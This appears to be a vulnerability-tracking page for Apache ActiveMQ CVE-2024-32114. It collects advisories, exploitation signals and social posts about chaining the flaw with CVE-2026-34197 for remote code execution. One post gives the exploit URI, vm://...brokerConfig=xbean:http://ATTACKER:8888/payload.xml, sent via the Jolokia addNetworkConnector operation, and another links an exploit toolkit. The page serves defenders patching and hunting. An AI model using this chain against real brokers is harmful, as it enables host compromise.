CVE-2024-32114Disclosure(apache / activemq)

HIGHCVSS 8.8 · HIGH

Exploitation ongoing with high activity in latest observed window (1 mentions)

Immediate actions

  • Patch apache activemq systems immediately
  • Assume compromise if assets are exposed
  • Hunt for exploitation attempts and persistence artifacts
  • Increase monitoring for publicly documented tradecraft

Recommended action window: Immediate (within 24h)

NVD description

In Apache ActiveMQ 6.x, the default configuration doesn't secure the API web context (where the Jolokia JMX REST API and the Message REST API are located). It means that anyone can use these layers without any required authentication. Potentially, anyone can interact with the broker (using Jolokia JMX REST API) and/or produce/consume messages or purge/delete destinations (using the Message REST API). To mitigate, users can update the default conf/jetty.xml configuration file to add authentication requirement: <bean id="securityConstraintMapping" class="org.eclipse.jetty.security.ConstraintMapping">   <property name="constraint" ref="securityConstraint" />   <property name="pathSpec" value="/" /> </bean> Or we encourage users to upgrade to Apache ActiveMQ 6.1.2 where the default configuration has been updated with authentication by default.

7.8/ 10 priority

Sources & remediation

Weakness type (CWE)
CWE-1188

Priority

HIGH

Exploitation

ACTIVE

PoC

YES

Patch

AVAILABLE

Momentum

STABLE

Are you affected?

If you run products in this scope, you should treat this CVE as relevant to your environment.

  • activemq

Threat summary

  • Active exploitation appears in 6 classified signals
  • Public PoC and exploit tooling are both present
  • Patch or workaround signal is available
  • 17 mentions across 14 observed days

What's happening

  • Active exploitation reported across 6 signals
  • Exploit tool or code specified in 2 signals
  • PoC mentioned or linked in 5 signals
  • Patch or workaround mentioned in 6 signals
  • Technical details provided in 12 signals
  • Disclosure: 6 classified signals
  • General: 2 classified signals
  • Peaked 13d ago at 2 mentions (2026-04-07); latest day: 1
  • 17 total mentions across 14 days

Affected systems

Vendors
Products
activemq

Deep dive

Activity timeline17 mentions / 14d
01122Mentions · 2026-04-07: 2Mentions · 2026-04-08: 2Mentions · 2026-04-10: 1Mentions · 2026-04-13: 1Mentions · 2026-04-16: 1Mentions · 2026-04-17: 1Mentions · 2026-04-19: 1Mentions · 2026-04-22: 2Mentions · 2026-04-23: 1Mentions · 2026-04-27: 1Mentions · 2026-05-14: 1Mentions · 2026-06-07: 1Mentions · 2026-06-08: 1Mentions · 2026-10-02: 1PoC Mentioned / Linked · 2026-04-07: 1PoC Mentioned / Linked · 2026-04-08: 1PoC Mentioned / Linked · 2026-05-14: 1PoC Mentioned / Linked · 2026-06-07: 1PoC Mentioned / Linked · 2026-06-08: 1Exploit Tool / Code · 2026-04-19: 1Exploit Tool / Code · 2026-06-08: 1Active Exploitation · 2026-04-07: 1Active Exploitation · 2026-04-17: 1Active Exploitation · 2026-04-19: 1Active Exploitation · 2026-04-22: 2Active Exploitation · 2026-05-14: 1Patch / Workaround · 2026-04-07: 1Patch / Workaround · 2026-04-08: 1Patch / Workaround · 2026-04-10: 1Patch / Workaround · 2026-04-13: 1Patch / Workaround · 2026-04-17: 1Patch / Workaround · 2026-04-19: 1Technical Details · 2026-04-07: 2Technical Details · 2026-04-08: 2Technical Details · 2026-04-10: 1Technical Details · 2026-04-13: 1Technical Details · 2026-04-16: 1Technical Details · 2026-04-17: 1Technical Details · 2026-04-19: 1Technical Details · 2026-04-22: 1Technical Details · 2026-05-14: 1Technical Details · 2026-06-07: 104-0704-0804-1004-1304-1604-1704-1904-2204-2304-2705-1406-0706-0810-02
Signal classification5 categories
Disclosure
637.5%
Active Exploitation
531.3%
General
212.5%
Patch
212.5%
Exploit
16.3%
Referenced assets11 URLs
Classification over time
DateTotalLabels
2026-04-072
Active Exploitation1General1
2026-04-082
Disclosure2
2026-04-101
Disclosure1
2026-04-131
Patch1
2026-04-161
Disclosure1
2026-04-171
Patch1
2026-04-191
Active Exploitation1
2026-04-222
Active Exploitation2
2026-04-231
Disclosure1
2026-04-271
General1
2026-05-141
Active Exploitation1
2026-06-071
Disclosure1
2026-06-081
Exploit1
Full discourse17 posts
  • The Hacker News@TheHackersNews
    Disclosure

    A 13-year-old flaw in Apache ActiveMQ can lead to RCE. CVE-2026-34197 lets attackers run OS commands via the Jolokia API. Chained with CVE-2024-32114, it becomes unauthenticated RCE on some versions. Patched in 5.19.4 and 6.2.3. 🔗 Learn more → https://thehackernews.com/2026/04/threatsday-bulletin-hybrid-p2p-botnet.html#chained-flaws-enable-stealth-rce https://t.co/8itN49FWEQ

    Post summary

    Apache ActiveMQ’s CVE-2026-34197 allows unauthenticated RCE via the Jolokia API and is chained with CVE-2024-32114; the issue is patched in versions 5.19.4 and 6.2.3.

    34421443022.0K
    1.7M followersView on X
  • Clandestine@akaclandestine
    Exploit

    GitHub - Catherines77/ActiveMQ-EXPtools: Apache ActiveMQ漏洞综合利用工具(CVE-2015-5254,CVE-2016-3088,CVE-2022-41678,CVE-2023-46604,CVE-2024-32114,CVE-2026-34197,CVE-2026-40466, CVE-2026-42588) · GitHub https://github.com/Catherines77/ActiveMQ-EXPtools

    Post summary

    A GitHub repository offering an exploit tool for multiple ActiveMQ CVEs, showcasing functional exploit code but lacking evidence of active exploitation or patch information.

    013051324.4K
    62.7K followersView on X
  • Jacob Baines@Junior_Baines
    Active Exploitation

    Our canary network is seeing unauthenticated exploitation of Apache ActiveMQ via CVE-2024-32114 + CVE-2026-34197. CVE-2024-32114 is not on CISA KEV but we added it to VulnCheck KEV today. We see spread of CVE-2026-34197, but CVE-2024-32114 is sourcing from Digital Ocean atm.

    Post summary

    Observed unauthenticated exploitation of Apache ActiveMQ CVE-2024-32114 and CVE-2026-34197 indicates active attacks in the wild.

    0821576.5K
    3.7K followersView on X
  • CodeWithSamzy@codewithsamzy
    Patch

    ⚠️ A critical vulnerability (CVE-2026-34197) has been identified in Apache ActiveMQ , present for over a decade. The issue lies in the Jolokia API, where insufficient input validation allows attackers to send crafted requests that trigger arbitrary OS command execution (RCE). When chained with CVE-2024-32114, the attack surface expands enabling unauthenticated RCE on certain configurations. Impact: • Remote command execution on the host • Full system compromise depending on privileges • No authentication required in some cases Patched in versions 5.19.4 and 6.2.3. If exposed externally, this is a high-risk target.

    Post summary

    CVE‑2026‑34197 in Apache ActiveMQ’s Jolokia API permits arbitrary OS command execution; the advisory lists patches for versions 5.19.4 and 6.2.3 and details the vulnerability’s impact.

    200801.8K
    434 followersView on X
  • Cantina 🪐@cantinasecurity
    General

    The issue is technically authenticated. The practical question is wider: who can reach 8161, who still has console credentials, and are any 6.0.0 through 6.1.1 nodes still widening exposure via CVE-2024-32114?

    Post summary

    The text is a query about the impact of CVE-2024-32114, noting it requires authentication but otherwise lacks evidence of exploitation, patches, or detailed vulnerability characteristics.

    00030549
    19.5K followersView on X
  • pdnuclei-bot@pdnuclei_bot
    Disclosure

    🚨 CVE-2024-32114 - high 🚨 Apache ActiveMQ 6.x &lt; 6.1.2 - Broken Access Control &gt; Apache ActiveMQ 6.x contains an unauthenticated API web context caused by default con... 👾 https://cloud.projectdiscovery.io/library/CVE-2024-32114 @pdnuclei #NucleiTemplates #cve

    Post summary

    The post announces CVE‑2024‑32114, a broken access‑control flaw in Apache ActiveMQ 6.x (prior to 6.1.2) that allows unauthenticated API access, and links to a detection library.

    0002058
    952 followersView on X
  • Autumn Good@autumn_good_35
    Disclosure

    『CVE-2024-32114 is not on CISA KEV but we added it to VulnCheck KEV today.』🧐

    Post summary

    The post announces that CVE‑2024‑32114 has been added to VulnCheck KEV, noting that it is not listed on the CISA KEV, with no accompanying PoC, exploit, or patch information.

    00100895
    6.8K followersView on X
  • iototsecnews@iototsecnews
    Disclosure

    ActiveMQ Jolokia API の RCE 脆弱性 CVE-2026-34197 が FIX:13 年放置の問題を AI が 10 分で発見 https://iototsecnews.jp/2026/04/08/claude-uncovers-13-year-old-rce-flaw-in-apache-activemq-in-just-10-minutes/ この脆弱性 CVE-2026-34197 は、過去の修正によって生まれた設定の不備に起因するものです。過去における CVE-2022-41678 の修正時に、利便性を優先して幅広い操作を許可してしまったことで、本来は制限されるべき管理機能が外部から呼び出せる状態になっていました。それに加えて CVE-2024-32114 の影響で認証を回避できてしまう環境があったことも、被害のリスクを高める要因となりました。ご利用のチームは、ご注意ください。 #ActiveMQ #AI #ML #Apache #CVE202634197 #Vulnerability

    Post summary

    The text announces the discovery of an RCE flaw (CVE‑2026‑34197) in the ActiveMQ Jolokia API by AI after 13 years of exposure, explains its origin due to previous configuration changes, but does not provide PoC, exploits, or evidence of active exploitation.

    01000113
    484 followersView on X
  • Syed Aquib@syedaquib77
    Active Exploitation

    ⚠️ **Vulnerability Alert:** Apache ActiveMQ — Consolidated RCE and Jolokia/OpenWire/Fileserver issues (CVE-2026-34197 + CVE-2024-32114 + CVE-2022-41678 + CVE-2023-46604 + CVE-2016-3088) 📅 **Timeline:** Disclosure: 2026-04-07, Patch: unknown 🆔 **CVE-2026-34197** | 📊 CVSS: 8.8 (HIGH 🟠) | 📈 EPSS: 18.84% 🆔 **CVE-2024-32114** | 📊 CVSS: 8.8 (HIGH 🟠) | 📈 EPSS: 83.74% 🆔 **CVE-2022-41678** | 📊 CVSS: 8.8 (HIGH 🟠) | 📈 EPSS: 99.84% 🆔 **CVE-2023-46604** | 📊 CVSS: 9.8 (CRITICAL 🔴) | 📈 EPSS: 99.99% 🆔 **CVE-2016-3088** | 📊 CVSS: 9.8 (CRITICAL 🔴) | 📈 EPSS: 99.94% 🛠️ **Exploit Maturity:** Proof-of-Concept (CVE-2026-34197); others vary (public exploits and known-exploited indications) 📂 **Affected Versions:** ActiveMQ Classic before 6.2.3 / before 5.19.4, ActiveMQ 6.0.0–6.1.1, Brokers/clients prior to 5.15.16/5.16.7/5.17.6/5.18.3, ActiveMQ 5.x before 5.14.0 🔧 **Fixed Versions:** 6.2.3, 5.19.5, 6.1.2, 5.16.6/5.17.4/5.18.0, 5.15.16/5.16.7/5.17.6/5.18.3 🫨 **Attack Vectors:** - Jolokia HTTP-to-JMX addNetworkConnector with vm://brokerConfig=xbean -> remote Spring XML load -> bean instantiation -> RCE - Unauthenticated Jolokia API (/api) in default ActiveMQ 6.0.0–6.1.1 - Jolokia ExecHandler / reflection-based exec via MBeans after authentication - OpenWire Java marshaller deserialization/manipulation leading to class instantiation and RCE - Fileserver webapp HTTP PUT + MOVE to upload and execute files 📝 **Summary:** Multiple ActiveMQ flaws allow remote code execution via Jolokia (remote JMX calls and exec handlers), OpenWire marshaller deserialization, and legacy fileserver upload/MOVE abuse; some are exploitable remotely without authentication in default configs. Successful exploitation can run commands as the ActiveMQ process, manipulate messages, and lead to full host compromise or outbound fetches to attacker-controlled hosts. 📈 **Impact Scope:** Remote code execution as the broker process, potential full host compromise, unauthorized produce/consume/purge of messages, and observable outbound HTTP fetches; high real-world exploitability indicated by elevated EPSS for several CVEs. 🛡️ **Recommended Actions:** - Apply vendor fixes immediately (see fixed versions above). - If you cannot patch now: block access to API/web endpoints, restrict Jolokia, and require Jetty authentication. - Rotate and audit broker credentials (remove default admin:admin) and block/monitor outbound HTTP from broker hosts. - Hunt logs for vm:// brokerConfig=xbean indicators, unexpected child processes, and run host EDR/forensics on suspected systems. 🪢 **Related Resources:** - https://horizon3.ai/intelligence/blogs/cve-2026-34197-activemq-rce-jolokia/ - https://activemq.apache.org/security-advisories.data/CVE-2026-34197-announcement.txt 🏷 **Tags:** #Cybersecurity #ApacheActiveMQ #RCE

    Post summary

    A multi‑CVEs ActiveMQ alert enumerates high‑severity RCE issues, offers PoC details, confirms active exploitation, and supplies patch and mitigation guidance.

    0001062
    276 followersView on X
  • Horizon3.ai@Horizon3ai
    General

    On paper: authenticated. In reality: - default creds (admin:admin) still common - some versions expose Jolokia unauth (CVE-2024-32114)

    Post summary

    The note indicates that CVE-2024-32114 allows unauthenticated access via default admin credentials in some versions, but no exploit details, patch information, or active exploitation evidence are provided.

    1000047
    2.7K followersView on X
  • ♫Why♥Not♪@Python_s_

    NØØT Security Alerts Classification: High CVE: CVE-2024-32114 Product: Apache / ActiveMQ Summary: VulnCheck reports real-world exploitation activity affecting Apache / ActiveMQ. Evidence: Active exploitation reported; Live exploitation observed by VulnCheck canaries Impact: The vulnerability can materially affect exposed systems; verify vendor-specific impact and affected versions. Action: Prioritize vendor remediation, identify exposed affected systems, and investigate for evidence of exploitation when applicable. Date: 22 Apr 2026 Source: https://vulncheck.com/ #NØØT #CyberSecurity #InfoSec #ThreatIntelligence #CyberThreats #CVE #CyberDefense #Apache #ActiveMQ #CVE_2024_32114 #ActiveExploitation #Exploit

    0000055
    226 followersView on X
  • Alexander Leonov@leonov_av
    Active Exploitation

    🚨 Apache ActiveMQ RCE (CVE-2026-34197): Jolokia API flaw → OS command execution; weak default creds (admin:admin) OR CVE-2024-32114 → effectively unauth RCE; exploit Apr 8, in-the-wild Apr 13, CISA KEV Apr 16, ~7k exposed. #ActiveMQ #RCE #CISAKEV ➡️ https://avleonov.com/2026/05/14/i054-about-remote-code-execution-apache-activemq-cve202634197-vulnerability/ https://t.co/NBKgGfgaXN

    Post summary

    The tweet reports that CVE-2026-34197 (and CVE-2024-32114) in Apache ActiveMQ is being actively exploited in the wild, enabling OS command execution via Jolokia API and weak default credentials, and links to a detailed analysis.

    00000131
    1.0K followersView on X
  • CTIWatch@ctiwatchcloud
    Active Exploitation

    🚨 [HIGH] Active exploitation detected: CVE-2024-32114 Exploit in the wild confirmed for CVE-2024-32114 (CVSS null). In Apache ActiveMQ 6.x, the default configuration doesn't secure the API web context (wh... 🔗 http://ctiwatch.cloud/alerts #ZeroDay #ExploitInWild #CyberSecurity

    Post summary

    CVE-2024-32114 is actively exploited in the wild; Apache ActiveMQ’s default configuration exposes an unsecured API web context, with no patch or workaround currently mentioned.

    00000113
    5.6K followersView on X
  • SecureChap@SecureChap
    Active Exploitation

    CVE-2026-34197 hit Apache ActiveMQ Classic with a CVSS 8.8 remote code execution. An authenticated POST to /api/jolokia/ on the web console (default port 8161) invokes the MBean operation addNetworkConnector(String) on org.apache.activemq:type=Broker,brokerName=localhost. The payload uses a crafted URI: vm://rce?brokerConfig=xbean:http://ATTACKER:8888/payload.xml. That URI forces ActiveMQ to fetch a remote Spring XML file and load it through ResourceXmlApplicationContext. Inside the XML, a MethodInvokingFactoryBean triggers Runtime.getRuntime().exec() for arbitrary code execution as the broker process. In versions 6.0.0-6.1.1, authentication can be bypassed by chaining with CVE-2024-32114 for unauthenticated access. Affected versions include 5.x before 5.19.4 and 6.x from 6.0.0 before 6.2.3. Patches released March 30, 2026, in 5.19.4 and 6.2.3 - they remove the ability to add vm:// transports via addNetworkConnector and add input validation. http://Horizon3.ai researcher Naveen Sunkavally prompted Anthropic's Claude to analyze the ActiveMQ source code. Claude spotted the Jolokia → JMX → VM transport → Spring chain in about 10 minutes. CISA added it to the Known Exploited Vulnerabilities catalog on April 16, 2026. Federal agencies must patch by April 30, 2026. An AI-assisted code review uncovered a multi-layer exploit path in minutes.

    Post summary

    CVE-2026-34197, a CVSS 8.8 remote code execution vulnerability in Apache ActiveMQ Classic, is actively exploited using a crafted vm:// URI that triggers arbitrary code execution via Spring XML. Patches are available and CISA has flagged the vulnerability as known exploited.

    0000058
    6 followersView on X
  • Shahzad Khalid  @ShahzadKhld
    Patch

    🚨Critical Vulnerability Alert: Apache ActiveMQ🚨 CISA has just added CVE-2026-34197 to its Known Exploited Vulnerabilities (KEV) catalog. If you are running Apache ActiveMQ, your window to secure your environment is closing fast. 🔍 The Threat: High-Severity RCE This vulnerability (CVSS 8.8) is a classic case of improper input validation. Attackers are exploiting the Jolokia JMX-HTTP bridge (typically found at /api/jolokia/) to inject malicious code. By sending a crafted request, an attacker can trick the broker into loading a remote Spring XML configuration. This leads to Remote Code Execution (RCE) on the broker's Java Virtual Machine (JVM). ⚠️ The "Zero-Day" Twist While only recently added to the KEV, this flaw has been "hiding in plain sight" for 13 years. 1- The Credentials Gap: While it generally requires authentication, many environments still use default credentials (admin:admin). 2- The Unauthenticated Risk: On versions 6.0.0 to 6.1.1, a secondary bug (CVE-2024-32114) inadvertently exposes the Jolokia API without any authentication, making this a "point-and-click" RCE for attackers. 🛡️ Immediate Actions Required Federal agencies must patch by April 30, 2026, but private organizations should treat this with equal urgency. 1- Update Now: Upgrade to 5.19.4 or higher. Upgrade to 6.2.3 or higher. 2- Audit Access: Check for externally accessible /api/jolokia/ endpoints and restrict them to trusted networks only. 3- Enforce MFA: Ensure the web console is not using default credentials and is protected by strong authentication. Don't wait for the deadline. Attackers are already scanning for exposed brokers. #CyberSecurity #Infosec #Apache #ActiveMQ #CISA #RCE #VulnerabilityManagement #TechAlert

    Post summary

    CISA has identified CVE‑2026‑34197 as a known exploited RCE in Apache ActiveMQ, urging immediate patching to 5.19.4/6.2.3 and tightening of Jolokia endpoints as attackers are already scanning for exposed brokers.

    0000053
    425 followersView on X
  • Vivek | Cybersecurity@VivekIntel
    Disclosure

    Apache ActiveMQ CVE-2026-34197 allows RCE via Jolokia API by forcing brokers to load attacker-controlled remote Spring configs, becoming unauthenticated RCE on versions 6.0.0–6.1.1 due to CVE-2024-32114. https://horizon3.ai/attack-research/disclosures/cve-2026-34197-activemq-rce-jolokia/

    Post summary

    The statement announces a confirmed RCE vulnerability (CVE-2026-34197) in Apache ActiveMQ via Jolokia, providing technical details and a link to further research.

    00000112
    2.0K followersView on X
  • Syed Aquib@syedaquib77
    Disclosure

    ⚠️ **Vulnerability Alert:** Apache ActiveMQ Classic — Jolokia JMX RCE chain (CVE-2026-34197) and related auth bypass (CVE-2024-32114) 📅 **Timeline:** Disclosure: 2024-05-02; 2026-04-07, Patch: 2024-05-02; 2026-04-07 🆔 **CVE-2026-34197** | 📊 CVSS: 8.8 (HIGH 🟠) | 📈 EPSS: 18.84% 🆔 **CVE-2024-32114** | 📊 CVSS: 8.8 (HIGH 🟠) | 📈 EPSS: 83.74% 🛠️ **Exploit Maturity:** Not Available 📂 **Affected Versions:** Apache ActiveMQ Broker < 5.19.4 (5.x), 6.0.0-6.2.2, 6.0.0-6.1.1 (unauth path for CVE-2024-32114) 🔧 **Fixed Versions:** 5.19.4, 6.2.3, 6.1.2 🫨 **Attack Vectors:** - Jolokia JMX-HTTP bridge exposed at /api/jolokia/ (web console, port 8161) - addNetworkConnector/addConnector via Jolokia -> vm:// transport with brokerConfig=xbean:http loading remote Spring XML -> Runtime.exec() - Authentication bypass in default 6.x API web context enabling unauthenticated access 📝 **Summary:** A Jolokia-managed JMX path allows loading attacker-controlled Spring XML that leads to OS command execution in the broker JVM (CVE-2026-34197); a default-auth bypass in some 6.x builds (CVE-2024-32114) can make this exploitable without credentials. Together they enable remote (potentially unauthenticated) RCE, message-queue compromise, data exfiltration, and lateral movement. 📈 **Impact Scope:** Remote code execution on the ActiveMQ broker JVM allowing arbitrary OS command execution, compromise of message queues, data exfiltration, and lateral movement; risk increases with default/weak credentials and public web consoles. 🛡️ **Recommended Actions:** - Upgrade immediately to vendor-fixed versions (5.19.4, 6.2.3, 6.1.2+ as applicable) - Inventory and patch all ActiveMQ instances, prioritize internet-facing and default-creds deployments - Restrict network access to port 8161/Jolokia, enforce authentication, and rotate default credentials - Monitor for POSTs to /api/jolokia/ with addNetworkConnector and vm:// URIs; block/monitor outbound HTTP from ActiveMQ processes and enable EDR for suspicious child processes 🪢 **Related Resources:** - https://activemq.apache.org/security-advisories.data/CVE-2026-34197-announcement.txt - https://horizon3.ai/attack-research/disclosures/cve-2026-34197-activemq-rce-jolokia/ 🏷 **Tags:** #Cybersecurity #ApacheActiveMQ #RCE

    Post summary

    The text announces the discovery of CVE-2026-34197 and CVE-2024-32114 in Apache ActiveMQ, detailing technical vectors and impact while emphasizing patch availability and remediation steps; no PoC or exploit code is shared.

    0000048
    276 followersView on X
CPE platform detail1 entries

1 of 1 entries

PartVendorProductVersionTarget SWTarget HW
Appapacheactivemq---

Explore more